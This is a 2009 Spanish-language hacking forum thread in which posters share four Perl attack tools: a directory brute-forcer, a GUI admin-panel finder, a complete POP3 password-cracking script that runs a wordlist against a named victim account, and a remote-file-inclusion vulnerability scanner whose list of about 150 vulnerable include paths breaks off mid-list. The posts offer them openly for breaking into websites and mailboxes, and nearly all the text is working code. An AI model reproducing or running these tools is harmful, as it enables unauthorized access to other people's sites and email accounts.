Brute Dir (perl) Priv8
 |
|
|
Herramientas |
|
#1
17-Sep-2009, 20:47
|
|||
|
|||
|
Brute Dir (perl) Priv8
Este codigo lo tengo desde hace un par de años.
es bueno porque aun escaniando la web de liceo de adolecente encontre un directorio con un script de instalacion para redireccionar. si que puede que les haga falta en alguna ocacion. Código:
#!/usr/bin/perl
use LWP::UserAgent;
my $ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309
Firefox/2.0.0.4");
use strict;
sub uso{
if (!$ARGV[0]){
system("clear");
print "_____________________________________________\n";
print "___________coded by p0fk \n";
print "________________________Bruter Dir \n";
print "_____________________________________________\n";
print "\n[?] perl bdir.pl http://www.website.com/ [?]\n\n\n\n\n";
exit;
}
}
my
@dir=('index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000','website','xampp','access','active','adm','admin','_admin','administrator',
'administracion','_administracion','~administracion','administer',
'upload','uploads','~adm','~admin','~administrator','~guest','~mail',
'~operator','~root','~sys','~sysadm','~sysadmin','~test','~user','~www',
'~webmaster','admin_upload','admin_uploadpic','editpassword',
'manager_userinfo','manager_tongji','managerenter','incupfile','inc',
'upfile','admin_index','admin_admin','index_admin','index','admindefault',
'default','manage','login','manage_index','index_manage','admin1',
'admin_login','login_admin','ad_login','ad_manage','count','manager',
'adminlogin','adminuserlogin','adm_login','chklogin','adduser','adminuser',
'admin_user','edituser','adminadduser','adminmember','addmember','adminedit',
'admin_edit','up','upfiles','aadmin','admintab','admin_main','fileadmin',
'databases','includeinc','***','app','apacheasp','apps','archive','archives',
'asp','back','backup','back-up','bak','bakup','bak-up','basic','bea','bin',
'binaries','broken','c','cc','connections','ccs','cache','cgi','fcgi',
'cgibin','cgi-win','class','classes','classified','classifieds','code',
'common','credit','creditcards','cv','cvs','customer','customers',
'CYBERDOCS','CYBERDOCS25','CYBERDOCS31','d','dfiles','data','database',
'db','dbase','dbm','dbms','demo','dev','devel','develop','development',
'doc','docs','docs41','docs51','dms','e','email','downloads','ecommerce',
'ebriefs','error','errors','esales','echannel','esupport','etc','exec',
'executable','executables','extra','extranet','examples','exchange',
'fcgi-bin','functions','feedback','file','files','forum','forums','ftp',
'graphics','galeria','gallery','galerias','guestbook','guests','help',
'hidden','hide','home','homes','htm','html','imagen','images','icons',
'incs','include','includes','interactive','internet','intranet','java',
'javascript','js','jsp','keep','kept','ldap','lib','libs','libraries',
'links','log','logfiles','logs','lightbox2','mail','me','members','mine',
'mirror','mirrors','mp3','mp3s','ms','mssql','ms-sql','music','my','new',
'old','online','order','orders','pages','_pages','pass','passes','passwd',
'password','polls','passwords','perl','personal','personals','php','_php',
'phpincludes','pics','pl','pls','plx','press','priv','private','products',
'production','pub','public','removed','reports','root','sales','save',
'saved','scripts','secret','secrets','security','servlet','servlets',
'soap','soapdocs','source','site','sites','SiteServer','sql','src',
'staff','stats','statistics','ssi','stuff','support','temp','temps','test',
'text','texts','tmp','user','users','var','vb','vbs','vbscript','vbscripts',
'weblogic','www','xcache','xsql','zip','zips','W3SVC','W3SVC3','index.php',
'index.html','phpmyadmin','phpMyAdmin','.bash_history','upload.php',
'upload.asp','uploader.php','uploader.asp','phpinfo.php','_banners',
'_adv','468','88','ads','adv','ban','baners','bann','banner','banners',
'bannerz','be','begun','bn','bnr','cnstats','cnt','phpadsnew','server-status',
'server-info','.server-status','.server-info','.passwd','INSTALL','_vti_log',
'admcgi','_notes','_tmp','_temp','panel','_panel','~panel','upFiles','img',
'es','css','socios','Documentation','INSTALLsetup.php','Upfile','cgi-bin',
'content','secure','mysql','4Dbin','trustscn_pdos','trustscn_pdos1','_vti_bin',
'Connections','_mmServerScripts','bot','imag','lobatos','phpmyadm','Phpmyadmin',
'PhpMyAdmin','PhpGAdmin','PhpInclude','PhpIncludes','phpscripts','PhpScripts',
'_vti_txt','cgi-local','cgis','WS_FTP.LOG','User.php','Upload.php','AlbumDB.php',
'add_comment.php','add_photo.php','admin.php','adm.php','adm.asp','admin.asp','main',
'web','global','globals','uploader','logon','sign','signin','example','update',
'readme','client','clients','cmd','logfile','details','shtml','asa','jsa',
'txt','cfm','sav','nsf','bat','com','exe','dll','reg','tar','tar.gz','tgz',
'o','sh','member','auth','login.php','user.php','admin.php~','members.php',
'members.php~','configuration.php~','config.php~','Setting.php~','Settings.php~',
'Settings_bak.php~','Setting_bak.php~','config-bak.php~','member.php','users.php',
'webadmin.php','webadmin','miembro','miembros','administrador','administration',
'config.php.inc','config.php.inc~','configuration.php.inc','configuration.php.inc~',
'DBConnection.inc','includesDBConnection.inc','includesDBConnection.php.inc','files','correo','imagenes','.bashrc','securecontrolpanel');
&uso;
my $error = "HTTP/1.1 404 Not Found";
my $ok = "HTTP/1.1 200 OK";
my $mtemp = "HTTP/1.x 302 Found";
system("clear");
print "_____________________________________________\n";
print "___________coded by p0fk \n";
print "________________________Bruter Dir \n";
print "_____________________________________________\n";
print "Bruteando...\t".$ARGV[0]."\n\n";
print "!EXISTE!\n\n";
foreach my$scan(@dir){
my $web = $ARGV[0].$scan;
my $req = HTTP::Request->new(GET => $web);
my $mreq= $ua->request($req)->as_string;
if($mreq =~ /$ok/){
print "$ARGV[0]$scan\n";
}
}
|
|
|
|
#2
17-Sep-2009, 20:50
|
|||
|
|||
|
Complemento.
Buscador de Panel de Administracion. para aquellos que me piden que se lo busque por msn  ....Código:
#!usr/bin/perl
##
# Coded By KuNdUz
##
use Tk;
use HTTP::Request;
use LWP::UserAgent;
$mw = MainWindow->new( -background => "black", -cursor=>"crosshair");
$mw->geometry("1070x325+100+300");
$mw->title("|_^_| Admin Control Panel Finder v1.2 |_^_|");
$mw->resizable(0,0);
$statusbar = "|_^_| Admin Control Panel Finder v1.2 |_^_|";
$statusbottom = $mw->Label(-textvariable => \$statusbar, -relief => 'flat', -background => "black", -foreground => "red", -font => "Verdana 7", -width => 120)->place(-x => 240, -y => 307);
$mw->Label(-background => "black", -foreground => "black")->pack();
$stat = "Control Panel Found";
$sta = $mw->Label(-textvariable => \$stat, -relief => 'flat', -background => "black", -foreground => "red", -font => "Verdana 9")->place(-x => 380, -y => 10);
$stat1 = "Control Panel Not Found";
$st = $mw->Label(-textvariable => \$stat1, -relief => 'flat', -background => "black", -foreground => "red", -font => "Verdana 9")->place(-x => 786, -y => 10);
$test1 = $mw->Scrolled("Text", -scrollbars => 'oe', -font => "Verdana 8", -background => "black", -foreground => "red", -selectbackground => "red", -insertbackground => "red", -relief => "ridge", -width => 55, -height=> 20)->pack(-side => 'right', -anchor => 'e');
$test2 = $mw->Scrolled("Text", -scrollbars => 'oe', -font => "Verdana 8", -background => "black", -foreground => "red", -selectbackground => "red", -insertbackground => "red", -relief => "ridge", -width => 55, -height=> 20)->pack(-side => 'right', -anchor => 'e');
$mw->Label(-background => "black", -foreground => "black")->pack();
$mw->Label(-background => "black", -foreground => "black")->pack();
$mw->Label(-background => "black", -foreground => "black")->pack();
$mw->Label(-background => "black", -foreground => "red", -font => "Verdana 9", -text => " Enter Site ")->pack(-anchor => 'nw');
$mw->Entry(-background => "black", -foreground => "red", -selectbackground => "black", -insertbackground => "red", -width => 40, -relief => "ridge", -textvariable => \$site)->pack(-anchor => 'nw');
$mw->Label(-background => "black", -foreground => "red", -font => "Verdana 9", -text => " Enter Site Source Code ")->pack(-anchor => 'nw');
$mw->Entry(-background => "black", -foreground => "red", -selectbackground => "black", -insertbackground => "red", -width => 40, -relief => "ridge", -textvariable => \$code)->pack(-anchor => 'nw');
$mw->Label(-background => "black", -foreground => "black")->pack();
$mw->Label(-background => "black", -foreground => "black")->pack();
$mw->Button(-activebackground => "red", -activeforeground => "black", -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Start", -width => 5, -command => \&scan)->place(-x => 40, -y => 190);
$mw->Button(-activebackground => "red", -activeforeground => "black", -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Stop", -width => 5, -command => \&sto )->place(-x => 95, -y => 190);
$mw->Button(-activebackground => "red", -activeforeground => "black", -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Clear", -width => 5, -command => \&cle)->place(-x => 150, -y => 190);
$mw->Button(-activebackground => "red", -activeforeground => "black", -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Help/About", -width => 9, -command => \&heaab)->place(-x => 50, -y => 240);
$mw->Button(-activebackground => "red", -activeforeground => "black", -background => "black", -foreground => "red", -font => "Verdana 7", -relief => "groove", -text => "Exit", -width => 5, -command => sub { exit })->place(-x => 133, -y => 240);
MainLoop;
sub heaab {
$about = $mw->Toplevel(-background => "black", -cursor=>"crosshair");
$about->geometry("500x422+425+250");
$about->title("|_^_| Admin Control Panel Finder v1.2 |_^_|");
$about->resizable(0,0);
$about->Label(-background => "black", -foreground=>"red")->pack();
$about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10", -text => "|_^_| Admin Control Panel Finder v1.2 Help |_^_|\n")->pack();
$about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10", -text => " -Enter Site-\nEnter Target address,\n exemplarily www.site.com or www.site.com/path")->pack();
$about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10", -text => " -Enter Site Source Code-\nEnter target site source code.\n Site source code php is the write php or\n Site source code asp is the write asp")->pack();
$about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10", -text => "\nEx:\n Enter Site : www.target.com\n Enter Site Source Code : php")->pack();
$about->Label(-background => "black", -foreground=>"red")->pack();
$about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 10", -text => "|_^_| Admin Control Panel Finder v1.2 About |_^_|\n")->pack();
$about->Label(-background => "black",-foreground => "red",-font => "wingdings 22", -text => "7")->pack();
$about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 11", -text => "Coded By KuNdUz")->pack();
$about->Label(-background => "black", -foreground=>"red", -font=> "Cambria 11", -text => "Enjoy! :)")->pack();
$about->Label(-background => "black", -foreground => "red", -font => "Cambria 8", -text => "10/12/2008")->pack(-anchor => "se");
$about->Button(-activebackground => "red", -activeforeground => "black", -background => "black", -foreground => "red", -relief => "groove", -font=> "Verdana 7", -text => "Exit", -command => [$about => 'destroy'])->pack(-fill => "both");
}
sub cle {
$test1->delete("0.0", "end");
$test2->delete("0.0", "end");
}
sub sto {
$sisite = "",
$ways = "",
@path1 = ""
}
sub scan {
$test1->delete("0.0", "end");
$test2->delete("0.0", "end");
$sisite = $site;
if ( $sisite !~ /^http:/ ) {
$sisite = 'http://' . $sisite;
}
if ( $sisite !~ /\/$/ ) {
$sisite = $sisite . '/';
}
if($code eq "php"){
@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php'
);
foreach $ways(@path1){
$statusbar = "Scaning path: " . $ways;
$statusbottom->update();
$statusbar = "|_^_| Admin Control Panel Finder v1.2 |_^_|";
$final=$sisite.$ways;
$req=HTTP::Request->new(GET=>$final);
$ua=LWP::UserAgent->new();
$ua->timeout(30);
$response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
$test2->insert('end', $final."\n");
}else{
$test1->insert('end', $final."\n");
}
}
}
if($code eq "asp"){
@path1=('admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
);
foreach $ways(@path1){
$statusbar = "Scaning path: " . $ways;
$statusbottom->update();
$statusbar = "|_^_| Admin Control Panel Finder v1.2 |_^_|";
$final=$sisite.$ways;
$req=HTTP::Request->new(GET=>$final);
$ua=LWP::UserAgent->new();
$ua->timeout(30);
$response=$ua->request($req);
if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
$test2->insert('end', $final."\n");
}else{
$test1->insert('end', $final."\n");
}
}
}
}
##
# Coded By KuNdUz
##
|
|
#3
17-Sep-2009, 20:55
|
|||
|
|||
|
Re: Brute Dir (perl) Priv8
Complemento:
Pop3 Brute Force. tambien antes era muy usado. ahora no tiene interes porque hay maneras mucho mas facil de entrar a los correos. Código:
#!/usr/bin/perl
# HAckers Venezuela http://www.hven.com.ve
# HV-POP3 Crack 07/06/99
# By DoctorX email: d0ct0r_x@hven.com.ve
#
# This Program make a Brute Force attack against the POP3 based in a
# Dictionary File, only that you need is a valid account and a Big List of
# Word.
#
# Tested on Red Hat 5.2,6.0 Slackware 3.6
#
# Fixes : - update POP3 Server to Secure POP3
# - make a filtering of POP3 port(110)
# - Contact me :-)
#
# Nota : This Program was made for educative issues only
# We Don't Care for the Things that you do with it
#
# Thanks to : Kliber ....................... Hot Dog Manager :-)
# darkdeath ....................... lainus Man :-P
# DunkelSeite ....................... SuperWebMan alias Ulcera
# LabX ....................... Exploits Box
# Kliberlandia ....................... HV-ZONE
# HVLAN ....................... The Battle Zone
# Drake ....................... LaQuemazon
# Cyber_Optik ....................... ThioZhino
#
# Excuse my Bad English
# Viva VENEZUELA!!!!!!!!!!!!!!!!!!!!!!!!
system clear;
use Socket;
$port = 110;
$victima = $ARGV[0];
$login = $ARGV[1];
$archivo = $ARGV[2];
if(@ARGV < 3) { &jeje;exit;}
$linea = " ===============================================================\n";
$mem1 = " Hackers Venezuela http://www.hven.com.ve\n";
$mem2 = " HV-POP3 Crack 07/06/99\n";
$mem3 = " by DoctorX email: d0ct0r_x\@\hven.com.ve\n";
open (LISTA,"$archivo");
$count = 0 ;
while ($entrada = <LISTA>){
chop $entrada;
$count++;
@nombres[$count] = $entrada ;
}
close(LISTA);
$total_lista = $count;
$verga = $count;
print $linea;
print $mem1;
print $mem2;
print $mem3;
print $linea;
$mem10 = " Total of Words : $count\n";
$mem11 = " Brute Force Attack ......!\n";
$mem4 = " User : $login\n";
print $mem10;
print $mem11;
print $mem4;
$verga--;
print " Accounts : 1 The Rest : $verga \n" ;
print $linea;
$contador = 1;
for ($y=0;$y<=$count;$y++){
$pass = @nombres[$y];
$mem9 = "user $login\n";
$mem8 = "pass $pass\n";
$NETFD = &makeconn($victima, $port);
sysread $NETFD, $message,100 or die "error Can't Read Socket Socket:$!";
send($NETFD,$mem9,0);
sysread $NETFD, $message,100 or die "error Can't Read Socket:$!";
send($NETFD,$mem8,0);
sysread $NETFD, $message,3 or die "error Can't Read Socket:$!";
if($message eq "+OK"){ &refrescar($count,$y,$login) ; print " Account Cracked login: $login \n"; print "
pass : \"$pass\" :-)\n"; print $linea; exit;}
if($message eq " +O"){ print " Account not Cracked login: $login \n"; print " pass : \"$pass\" :-)\n"; print
$linea; exit;}
close $NETFD;
$contador++;
if($contador eq "6"){ $contador = 0; &refrescar($count,$y,$login);}
}
print " Bad Milk \"$login\" Account not Cracked!! :-(\n";
print $linea;
sub makeconn {
my ($host, $portname, $server, $pt,$pts, $proto, $servaddr);
$host = $_[0];
$pt = $_[1];
$server = gethostbyname($host) or
die "gethostbyname: cannot locate host: $!";
$pts = getservbyport($pt, 'tcp') or
die "getservbyname: cannot get port : $!";
$proto = getprotobyname('tcp') or die " : $!";
$servaddr = sockaddr_in($pt, $server);
socket(CONNFD, PF_INET, SOCK_STREAM, $proto);
connect(CONNFD, $servaddr) or die "connect : $!";
return CONNFD;
}
sub jeje {
my ($sal1,$sal2,$sal3,$sal4,$sal5);
$sal1 = " Hackers Venezuela http://www.hven.com.ve \n";
$sal2 = " HV-POP3 Crack 07/06/99\n";
$sal3 = " by DoctorX email: d0ct0r_x\@\hven.com.ve\n";
$sal4 = " ===============================================================\n";
$sal5 = " issue : perl hv-pop3 host login words_file\n";
print $sal4;
print $sal1;
print $sal2;
print $sal3;
print $sal4;
print $sal5;
print $sal4;
}
sub refrescar {
my ($sal1,$sal2,$sal3,$sal4,$sal5);
system clear;
$sal1 = " Hackers Venezuela http://www.hven.com.ve \n";
$sal2 = " HV-POP3 Crack 07/06/99\n";
$sal3 = " by DoctorX email: d0ct0r_x\@\hven.com.ve\n";
$sal4 = " ===============================================================\n";
$total = $_[0];
$intentos = $_[1];
$account = $_[2];
$restantes = $total - $intentos;
$sal5 = " Words Probed : $intentos ";
$sal6 = " Less Words : $restantes \n";
$user = " User : $account\n";
print $sal4;
print $sal1;
print $sal2;
print $sal3;
print $sal4;
print $mem10,$mem11,$user;
print $sal5;
print $sal6;
print $sal4;
}
|
|
#4
17-Sep-2009, 20:58
|
|||
|
|||
|
Complemento:
RFI PRIV8 SCANNER Código:
# ! /usr/ bin/ perl
#Scan a host for rfi vulnerability
# by priv8, senk0 version
use HTTP::Request;
use LWP::UserAgent;
&inizio;
sub inizio{
print q(
###########################
Rfi vulnerability scanner
by nobody, senk0 version
###########################
);
print "\n Insert host:(ex: http://www.site.com/)\n";
$host=<STDIN>;
chomp($host);
print "Ok lets scan..\n";
$rfi1="includes/header.php?systempath=";
$rfi2="Gallery/displayCategory.php?basepath=";
$rfi3="index.inc.php?PATH_Includes=";
$rfi4="nphp/nphpd.php?nphp_config[LangFile]=";
$rfi5="include/db.php?GLOBALS[rootdp]=";
$rfi6="ashnews.php?pathtoashnews=";
$rfi7="ashheadlines.php?pathtoashnews=";
$rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi9="demo/includes/init.php?user_inc=";
$rfi10="jaf/index.php?show=";
$rfi11="inc/shows.inc.php?cutepath=";
$rfi12="poll/admin/common.inc.php?base_path=";
$rfi13="pollvote/pollvote.php?pollname=";
$rfi14="sources/post.php?fil_config=";
$rfi15="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi16="bb_lib/checkdb.inc.php?libpach=";
$rfi17="include/livre_include.php?no_connect=lol&chem_absolu=";
$rfi18="index.php?from_market=Y&pageurl=";
$rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi20="pivot/modules/module_db.php?pivot_path=";
$rfi21="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi22="derniers_commentaires.php?rep=";
$rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=";
$rfi26="coppermine/themes/maze/theme.php?THEME_DIR=";
$rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=";
$rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=";
$rfi30="myPHPCalendar/admin.php?cal_dir=";
$rfi31="agendax/addevent.inc.php?agendax_path=";
$rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=";
$rfi34="main.php?page=";
$rfi35="default.php?page=";
$rfi36="index.php?action=";
$rfi37="index1.php?p=";
$rfi38="index2.php?x=";
$rfi39="index2.php?content=";
$rfi40="index.php?conteudo=";
$rfi41="index.php?cat=";
$rfi42="include/new-visitor.inc.php?lvc_include_dir=";
$rfi43="modules/agendax/addevent.inc.php?agendax_path=";
$rfi44="shoutbox/expanded.php?conf=";
$rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi46="pivot/modules/module_db.php?pivot_path=";
$rfi47="library/editor/editor.php?root=";
$rfi48="library/lib.php?root=";
$rfi49="e107/e107_handlers/secure_img_render.php?p=";
$rfi50="zentrack/index.php?configFile=";
$rfi51="main.php?x=";
$rfi52="becommunity/community/index.php?pageurl=";
$rfi53="GradeMap/index.php?page=";
$rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir=";
$rfi55="calendar/calendar.php?serverPath=";
$rfi56="calendar/functions/popup.php?serverPath=";
$rfi57="calendar/events/header.inc.php?serverPath=";
$rfi58="calendar/events/datePicker.php?serverPath=";
$rfi59="calendar/setup/setupSQL.php?serverPath=";
$rfi60="calendar/setup/header.inc.php?serverPath=";
$rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=";
$rfi62="zentrack/index.php?configFile=";
$rfi63="pivot/modules/module_db.php?pivot_path=";
$rfi64="inc/header.php/step_one.php?server_inc=";
$rfi65="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi66="inc/pipe.php?HCL_path=";
$rfi67="include/write.php?dir=";
$rfi68="include/new-visitor.inc.php?lvc_include_dir=";
$rfi69="includes/header.php?systempath=";
$rfi70="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi71="coppercop/theme.php?THEME_DIR=";
$rfi72="zentrack/index.php?configFile=";
$rfi73="pivot/modules/module_db.php?pivot_path=";
$rfi74="inc/header.php/step_one.php?server_inc=";
$rfi75="install/index.php?lng=../../include/main.inc&G_PATH=";
$rfi76="inc/pipe.php?HCL_path=";
$rfi77="include/write.php?dir=";
$rfi78="include/new-visitor.inc.php?lvc_include_dir=";
$rfi79="includes/header.php?systempath=";
$rfi80="support/mailling/maillist/inc/initdb.php?absolute_path=";
$rfi81="coppercop/theme.php?THEME_DIR=";
$rfi82="becommunity/community/index.php?pageurl=";
$rfi83="shoutbox/expanded.php?conf=";
$rfi84="agendax/addevent.inc.php?agendax_path=";
$rfi85="myPHPCalendar/admin.php?cal_dir=";
$rfi86="yabbse/Sources/Packages.php?sourcedir=";
$rfi87="dotproject/modules/projects/addedit.php?root_dir=";
$rfi88="dotproject/modules/projects/view.php?root_dir=";
$rfi89="dotproject/modules/projects/vw_files.php?root_dir=";
$rfi90="dotproject/modules/tasks/addedit.php?root_dir=";
$rfi91="dotproject/modules/tasks/viewgantt.php?root_dir=";
$rfi92="My_eGallery/public/displayCategory.php?basepath=";
$rfi93="modules/My_eGallery/public/displayCategory.php?basepath=";
$rfi94="modules/4nAlbum/public/displayCategory.php?basepath=";
$rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR=";
$rfi96="modules/agendax/addevent.inc.php?agendax_path=";
$rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=";
$rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR=";
$rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path=";
$rfi101="shoutbox/expanded.php?conf=";
$rfi102="pivot/modules/module_db.php?pivot_path=";
$rfi103="library/editor/editor.php?root=";
$rfi104="library/lib.php?root=";
$rfi105="e107/e107_handlers/secure_img_render.php?p=";
$rfi106="main.php?x=";
$rfi107="main.php?page=";
$rfi108="index.php?meio.php=";
$rfi109="index.php?include=";
$rfi110="index.php?inc=";
$rfi111="index.php?page=";
$rfi112="index.php?pag=";
$rfi113="index.php?p=";
$rfi114="index.php?x=";
$rfi115="index.php?open=";
$rfi116="index.php?visualizar=";
$rfi117="index.php?pagina=";
$rfi118="index2.php?content=";
$rfi119="inc/step_one_tables.php?server_inc=";
$rfi120="GradeMap/index.php?page=";
$rfi121="phpshop/index.php?base_dir=";
$rfi122="admin.php?cal_dir=";
$rfi123="contacts.php?cal_dir=";
$rfi124="convert-date.php?cal_dir=";
$rfi125="album_portal.php?phpbb_root_path=";
$rfi126="mainfile.php?MAIN_PATH=";
$rfi127="dotproject/modules/files/index_table.php?root_dir=";
$rfi128="html/affich.php?base=";
$rfi129="gallery/init.php?HTTP_POST_VARS=";
$rfi130="pm/lib.inc.php?pm_path=";
$rfi131="ideabox/include.php?gorumDir=";
$rfi132="index2.php?includes_dir=";
$rfi133="forums/toplist.php?phpbb_root_path=";
$rfi134="forum/toplist.php?phpbb_root_path=";
$rfi135="admin/config_settings.tpl.php?include_path=";
$rfi136="include/common.php?include_path=";
$rfi137="event/index.php?page=";
$rfi138="forum/index.php?includeFooter=";
$rfi139="forums/index.php?includeFooter=";
$rfi140="forum/bb_admin.php?includeFooter=";
$rfi141="forums/bb_admin.php?includeFooter=";
$rfi142="language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path=";
$rfi144="blend_data/blend_common.php?phpbb_root_path=";
$rfi145="master.php?root_path=";
$rfi146="includes/kb_constants.php?module_root_path=";
$rfi147="forum/includes/kb_constants.php?module_root_path=";
$rfi148="forums/includes/kb_constants.php?module_root_path=";
$rfi149="classes/adodbt/sql.php?classes_dir=";
$rfi150="agenda.php3?rootagenda=";
$rfi151="agenda2.php3?rootagenda=";
$rfi152="sources/lostpw.php?CONFIG[path]=";
